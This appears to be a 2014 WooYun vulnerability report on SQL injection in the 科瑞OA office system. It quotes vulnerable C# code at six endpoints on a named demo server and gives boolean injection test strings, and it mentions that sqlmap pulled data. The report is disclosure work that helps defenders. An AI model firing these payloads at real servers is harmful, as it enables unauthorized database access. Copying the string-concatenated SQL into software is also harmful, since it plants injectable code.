当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061648

漏洞标题:某OA系统越权导致多处SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-05-20 23:06

修复时间:2014-08-18 23:08

公开时间:2014-08-18 23:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-25: 厂商已经确认,细节仅向厂商公开
2014-05-28: 细节向第三方安全合作伙伴开放
2014-07-19: 细节向核心白帽子及相关领域专家公开
2014-07-29: 细节向普通白帽子公开
2014-08-08: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

对于oa的 我只找了demo站进行测试

详细说明:

科瑞OA
公司主页

http://www.shkrsoft.com/


测试站连接

http://www.shkrsoft.com/yanshi/onlinetest.asp


这就是测试站了

http://113.128.254.170:8088/OA/login.aspx


第一处

http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx


protected void Page_Load(object sender, EventArgs e)
{
DataTable table = new DataTable();
string str = base.Request["goodsName"];
if (string.IsNullOrEmpty(str))
{
if (str != "")
{
table = DbTool.ExecuteDataTable("SELECT P.PROVIDERID,P.PROVIDERNAME FROM JXNF_PROVIDER P WHERE P.ISDEL=0 AND ISSAVE!='未保存' AND PROVIDERSTATE='关闭' AND P.PROVIDERNAME LIKE '%" + str + "%'"); //没对参数进行处理
}
}
else
{
table = DbTool.ExecuteDataTable("SELECT P.PROVIDERID,P.PROVIDERNAME FROM JXNF_PROVIDER P WHERE P.ISDEL=0 AND ISSAVE!='未保存' AND PROVIDERSTATE='关闭' AND P.PROVIDERNAME LIKE '%" + str + "%'");
}
base.Response.Write(JsonConvert.SerializeObject(table));
}


证明如下
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx


提交

goodsName=%


正常显示

5205.png


提交

goodsName=%' and 1=1--


5206.png


提交

goodsName=%' and 1=2 --


5207.png


可判断存在注入
用sqlmap 可获得数据

52011.png


第二处

http://113.128.254.170:8088/oa/erp/SelectObject/SelctYingShouXSCK.aspx


protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
this.Bind(false);
}
}
public void Bind(bool check)
{
StringBuilder builder = new StringBuilder();
builder.Append("SELECT TI.ITEMID,TH.TIHUOCODE,C.CUSTOMER,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,TI.REALITY,TI.PRICE,'0' SHUILV\r\n FROM JXNF_TIHUOITEM TI\r\n LEFT JOIN JXNF_TIHUO TH ON TI.WARRANTID=TH.TIHUOID\r\n LEFT JOIN JXNF_CUSTOMER C ON TH.CUSTOMERID=C.CUSTOMERID\r\n LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=TI.PRODUCTID\r\n WHERE TH.STATE IN ('全部出库','部分出库') AND ISYINGSHOU='0' AND TH.CUSTOMERID='" + base.Request["customerid"] + "' ");//customerid参数没处理存在注入
builder.Append(" and ti.itemid not in (select billid from jxnf_yingshoubody)");
if (check)
{
builder.Append(this.tbOutInCode.Text.Trim().Equals("") ? "" : (" AND TH.TIHUOCODE LIKE '%" + this.tbOutInCode.Text.Trim() + "%'"));
builder.Append(this.tbZdMan.Text.Trim().Equals("") ? "" : (" AND TH.ZDMAN IN (SELECT EMP_ID FROM JXNF_EMPLOYEES E ON E.EMP_NAME LIKE '%" + this.tbZdMan.Text.Trim() + "%')"));
builder.Append(this.tbZdDate.Text.Trim().Equals("") ? "" : (" AND ZDDATE='" + this.tbZdMan.Text.Trim() + "'"));
builder.Append(this.tbProductCode.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTCODE LIKE '%" + this.tbProductCode.Text.Trim() + "%'"));
builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text + "%'"));
builder.Append(this.tbModel.Text.Trim().Equals("") ? "" : (" AND MODEL LIKE '" + this.tbModel.Text.Trim() + "'"));
}
pg.Sql = builder.ToString();
pg.SqlKey = "TI.ITEMID";
this.AspNetPager1.RecordCount = pg.GetRecordCount();
pg.PageSize = this.AspNetPager1.PageSize;
pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
this.GridViewMain.DataSource = pg.GetPageData();
this.GridViewMain.DataBind();
}


证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelctYingShouXSCK.aspx


提交

customerid=1000

正常显示

5208.png


提交

customerid=1000' and 1=1--

正常显示

5209.png


提交

customerid=1000' and 1=2 --


52010.png


可得知存在注入 mssql是可以爆出东西 就不再用sqlmap扫一遍了
第三处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCGYFCheck.aspx


protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
this.Bind(false);
}
}
protected void Bind(bool bol)
{
try
{
pg.PageType = PaginationType.TopNotIn;
StringBuilder builder = new StringBuilder();
builder.Append("SELECT TYPE+'_'+CONVERT(VARCHAR(10),ITEMID) TYPEITEMID,ITEMID,TYPE,CODE,PROVIDERID,PROVIDERNAME,PRODUCTID,PRODUCTCODE,PRODUCTNAME,MODEL,UNIT,NUM,YFNUM,WYFNUM FROM (SELECT C.ITEMID ITEMID,'采购入库' TYPE,G.RKCODE CODE,G.PROVIDERID,V.PROVIDERNAME,C.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(C.RKNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(C.RKNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_PARIVER C \r\n LEFT JOIN JXNF_CGENTER G ON G.ENTERID=C.CGRKID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=G.PROVIDERID LEFT JOIN JXNF_PRODUCT P ON C.PRODUCTID=P.PRODUCTID LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n WHERE F.STATE='已审核' AND Y.CODETYPE='采购入库' GROUP BY Y.BILLID) A ON A.BILLID=C.ITEMID WHERE G.STATE='已审核' AND ISNULL(A.NUM,0)<ISNULL(C.RKNUM,0)");
builder.Append(" UNION ALL ");
builder.Append("SELECT T.ID ITMEID,'采购退货' TYPE,H.THCODE CODE,H.PROVIDERID,V.PROVIDERNAME,T.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(T.THNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(T.THNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_CGTHBODY T \r\n LEFT JOIN JXNF_CGTHHEAD H ON H.ID=T.THID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=H.PROVIDERID LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=T.PRODUCTID\r\n LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n WHERE F.STATE='已审核' AND Y.CODETYPE='采购退货' GROUP BY Y.BILLID) A ON A.BILLID=T.ID WHERE H.STATE='已审核' AND ISNULL(A.NUM,0)<ISNULL(T.THNUM,0)");
builder.Append(" UNION ALL ");
builder.Append("SELECT Q.OTHERBODYID ITEMID,'其他入库' TYPE,T.OTHERCODE CODE,T.CHANGEPLACE PROVIDERID,V.PROVIDERNAME,Q.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(Q.GOODNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(Q.GOODNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_QTCRKBODY Q \r\n LEFT JOIN JXNF_QTCRKHEAD T ON T.OTHERHEADID=Q.OTHERHID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=T.CHANGEPLACE LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=Q.PRODUCTID\r\n LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n WHERE F.STATE='已审核' AND Y.CODETYPE='其他入库' GROUP BY Y.BILLID) A ON A.BILLID=Q.OTHERBODYID WHERE T.STATE='完结' AND T.OTHER='其他入库' \r\n AND T.BUSINESSTYPE IN (SELECT B_Typeid FROM JXNF_BusinessType WHERE B_TypeClass='采购相关' and B_IsGenerateBill=2) AND ISNULL(A.NUM,0)<ISNULL(Q.GOODNUM,0)");
builder.Append(" UNION ALL ");
builder.Append("SELECT Q.OTHERBODYID ITEMID,'其他出库' TYPE,T.OTHERCODE CODE,T.CHANGEPLACE PROVIDERID,V.PROVIDERNAME,Q.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(Q.GOODNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(Q.GOODNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_QTCRKBODY Q \r\n LEFT JOIN JXNF_QTCRKHEAD T ON T.OTHERHEADID=Q.OTHERHID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=T.CHANGEPLACE LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=Q.PRODUCTID\r\n LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n WHERE F.STATE='已审核' AND Y.CODETYPE='其他出库' GROUP BY Y.BILLID) A ON A.BILLID=Q.OTHERBODYID WHERE T.STATE='完结' AND T.OTHER='其他出库' \r\n AND T.BUSINESSTYPE IN (SELECT B_Typeid FROM JXNF_BusinessType WHERE B_TypeClass='采购相关' and B_IsGenerateBill=2) AND ISNULL(A.NUM,0)<ISNULL(Q.GOODNUM,0)) A WHERE 1=1");
if (base.Request["provid"].ToString() != "")
{
builder.Append(" AND PROVIDERID='" + base.Request["provid"].ToString() + "'"); //存在注入
}
builder.Append(" ORDER BY CODE DESC");
pg.Sql = builder.ToString();
pg.SqlKey = "CODE+CAST(PRODUCTID as NVARCHAR(10))+CAST(ITEMID as NVARCHAR(10))";
this.AspNetPager1.RecordCount = pg.GetRecordCount();
pg.PageSize = this.AspNetPager1.PageSize;
pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
this.GridViewMain.DataSource = pg.GetPageData();
this.GridViewMain.DataBind();
}
catch
{
ScriptManager.RegisterClientScriptBlock(this.UpdatePanel1, base.GetType(), "123", "alert('页面数据加载失败,请重新加载页面!');", true);
}
}


证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCGYFCheck.aspx


提交

provid=1000


正常显示

52012.png


提交

provid=1000' and 1=1 --


52013.png


提交

provid=1000' and 1=2 --


52014.png


可判断存在注入
第四处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCaiGouTuiHuoDetails.aspx


protected void Page_Load(object sender, EventArgs e)
{
base.Response.Buffer = true;
base.Response.Expires = 0;
base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
base.Response.CacheControl = "no-cache";
if (!base.IsPostBack)
{
this.Bind(false, base.Request["providerid"].ToString()); //没处理
}
}
protected void Bind(bool bo, string cusid)
{
try
{
pg.PageType = PaginationType.TopNotIn;
StringBuilder builder = new StringBuilder();
builder.Append("select p.ID itemid,g.thCODE,r.providerid,r.providername,\r\n d.productid,d.productname,d.model,p.thnum\r\n from JXNF_CGTHBODY p\r\n left join JXNF_CGTHhead g on g.ID=p.thID\r\n left join jxnf_provider r on r.providerid=g.providerid\r\n left join jxnf_product d on d.productid=p.productid\r\n where 1=1 and r.providerid='" + base.Request["providerid"].ToString() + "'");//没处理
builder.Append(" and p.ID not in (select billid from jxnf_yingfubody)");
if (bo)
{
builder.Append(this.tbOrderCode.Text.Trim().Equals("") ? "" : (" and g.thCODE LIKE '%" + this.tbOrderCode.Text.Trim() + "%'"));
builder.Append(this.tbCustomerName.Text.Trim().Equals("") ? "" : (" and r.providerid LIKE '%" + this.tbCustomerName.Text.Trim() + "%'"));
builder.Append(this.tbProductID.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTID LIKE '%" + this.tbProductID.Text.Trim() + "%'"));
builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text.Trim() + "%'"));
}
pg.Sql = builder.ToString();
pg.SqlKey = "p.ITEMID";
this.AspNetPager1.RecordCount = pg.GetRecordCount();
pg.PageSize = this.AspNetPager1.PageSize;
pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
this.GridViewMain.DataSource = pg.GetPageData();
this.GridViewMain.DataBind();
}
catch
{
ScriptManager.RegisterClientScriptBlock(this.UpdatPanel1, base.GetType(), "123", "alert('数据加载失败,请重新加载页面!');", true);
}
}


漏洞证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCaiGouTuiHuoDetails.aspx


提交

providerid=1000

正常显示

52015.png


提交

providerid=1000' and 1=1 --


52016.png


提交

providerid=1000' and 1=2 --


52017.png


可判断存在注入
第五处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectTuiHouDetails.aspx


protected void Page_Load(object sender, EventArgs e)
{
base.Response.Buffer = true;
base.Response.Expires = 0;
base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
base.Response.CacheControl = "no-cache";
if (!base.IsPostBack)
{
if (base.Request["customerid"].ToString() != "no")
{
this.Bind(false, base.Request["customerid"].ToString());
}
else
{
this.Bind(false);
}
}
protected void Bind(bool bo, string cusid)
{
try
{
pg.PageType = PaginationType.TopNotIn;
StringBuilder builder = new StringBuilder();
builder.Append("select i.F_QICODE QUITITEMID,q.F_CODE thcode,c.customer,c.customerid,\r\n q.F_QUITTIME thDate,p.productid,p.productcode,p.productname,p.model,convert(decimal(10,2),i.F_NUM) thNum,isnull(convert(decimal(10,2),b.zjnum),0) zjnum\r\n from JXNF_QUITITEM i\r\n left join jxnf_quit q on i.F_QUITID=q.F_ID\r\n left join jxnf_customer c on c.customerid=q.F_CURSORMENT\r\n left join jxnf_product p on p.productid=i.F_PRODUCTID\r\n left join (select relateid,sum(isnull(AMOUNT,0)) zjNum from JXNF_BULLETIN where zhuangtai='已审核' group by relateid) b on b.RELATEID=i.f_qicode\r\n where 1=1");
builder.Append(" and i.F_QICODE not in (select billid from jxnf_yingshoubody)");
if (base.Request["type"].ToString().Equals("1"))
{
builder.Append(" and p.ISZHIJIAN='1' and i.f_state='未质检'\r\n and i.f_qicode not in (select RELATEID from jxnf_bulletin where zhuangtai='未审核')");
}
else if (base.Request["type"].ToString().Equals("3"))
{
builder.Append(" and p.ISZHIJIAN='0' and i.f_state='未质检'");
}
else
{
builder.Append(" and p.ISZHIJIAN='0'");
}
if (bo) //这下面的参数都没进行处理
{
builder.Append(this.tbOrderCode.Text.Trim().Equals("") ? "" : (" q.F_CODE LIKE '%" + this.tbOrderCode.Text.Trim() + "%'"));
builder.Append(this.tbCustomerName.Text.Trim().Equals("") ? "" : (" C.CUSTOMER LIKE '%" + this.tbCustomerName.Text.Trim() + "%'"));
builder.Append(this.tbProductID.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTID LIKE '%" + this.tbProductID.Text.Trim() + "%'"));
builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text.Trim() + "%'"));
}
pg.Sql = builder.ToString();
pg.SqlKey = "i.F_QICODE";
this.AspNetPager1.RecordCount = pg.GetRecordCount();
pg.PageSize = this.AspNetPager1.PageSize;
pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
this.GridViewMain.DataSource = pg.GetPageData();
this.GridViewMain.DataBind();
}
catch
{
ScriptManager.RegisterClientScriptBlock(this.UpdatPanel1, base.GetType(), "123", "alert('数据加载失败,请重新加载页面!');", true);
}
}


漏洞证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectTuiHouDetails.aspx?type=0&customerid=1000


在客户名称处输入

%

然后点击查询

52018.png


在客户名称处输入

%' and 1=1 --

然后点击查询

52019.png


在客户名称处输入

%' and 1=2 --

然后点击查询

52020.png


可得知存在注入
第六处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectZhiJian.aspx


访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectZhiJian.aspx


点击任务单
在任务单号里输入

%

点击查询

52021.png


在任务单号里输入

%' and 1=1 --

点击查询

52022.png


在任务单号里输入

%' and 1=2 --

点击查询

52023.png


可判断存在注入

漏洞证明:

漏洞证明如上

修复方案:

对权限进行限制然后对参数进行处理

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-25 14:32

厂商回复:

最新状态:

暂无